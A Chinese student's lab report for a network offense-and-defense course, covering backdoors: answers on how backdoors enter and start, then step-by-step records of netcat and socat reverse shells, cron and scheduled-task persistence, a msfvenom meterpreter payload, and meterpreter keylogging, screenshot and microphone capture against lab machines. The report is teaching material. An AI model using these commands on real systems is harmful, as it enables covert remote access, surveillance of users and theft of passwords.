20144303石宇森《网络对抗》后门原理与实践
20144303石宇森《网络对抗》 后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统
(2)例举你知道的后门如何启动起来(win及linux)的方式?
-
Windows:用户自己运行了后门软件、设置了任务计划启动
-
linux:设置了cron启动,在到达规定的时间时后门启动
(3)Meterpreter有哪些给你映像深刻的功能?
最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。
细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。
(4)如何发现自己有系统有没有被安装后门?
简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。
实验总结与体会
实践总结:
- 通过此次实验,掌握了一下基本内容:
- Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
- linux如何获取目标主机的shell:通过命令
nc -l -p
打开端口,等待目标主机连接即可获得其shell - 学会打开cron启动
- 掌握打开任务计划启动的方法
- 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
- 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)
心得体会
完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!
实验过程记录
一、使用netcat获取主机操作Shell,cron启动:
Windows获取linux的shell:
1、在Windows下查看主机的ip地址
2、ncat.exe -l -p 4303
打开监听
3、nc 192.168.75.129 4303 -e /bin/sh
在linux下反弹式连接到Windows
4、Windows获得了linux的shell
linux获得Windows的shell:
1、查看linux的ip地址
2、nc -l -p 4303
打开监听端口
3、ncat.exe -e cmd.exe 192.168.75.128 4303
让Windows连接到linux上
4、linux获得了Windows主机的shell
cron启动:
1、Windows打开监听端口
2、用指令crontab -e
对定时任务进行编辑。将最后一行修改为
45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh
3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell
二、使用socat获取主机操作Shell, 任务计划启动
1、新建一个触发器,开始任务选择工作站锁定时。
2、新建操作,选择启动程序,程序定位到socat.exe,参数填
tcp-listen:4303 exec:cmd.exe,pty,stderr
3、按ALT+L锁定计算机用户,使新建的操作触发
4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303
连接到Windows主机,获取Windows的shell
三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe
自动生成一个后门程序
2、windows打开监听端口,等待linux传输后门文件
3、kali端将后门软件传输给Windows
四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1、输入msfconsole
进入msf控制台
2、修改IP地址和端口号
3、在windows下打开后门软件
4、使用exploit
命令对Windows进行攻击
5、攻击成功,kali获得了Windows的shell
6、screenshot
命令截取目标机的屏幕
7、使用摄像头拍照、录像。(不知为何失败了)
8、使用命令record_mic
截取一段音频
9、使用命令keyscan_start和keysca_dump
捕获靶机的键入信息
10、查看当前用户
11、查看文件
12、命令靶机关机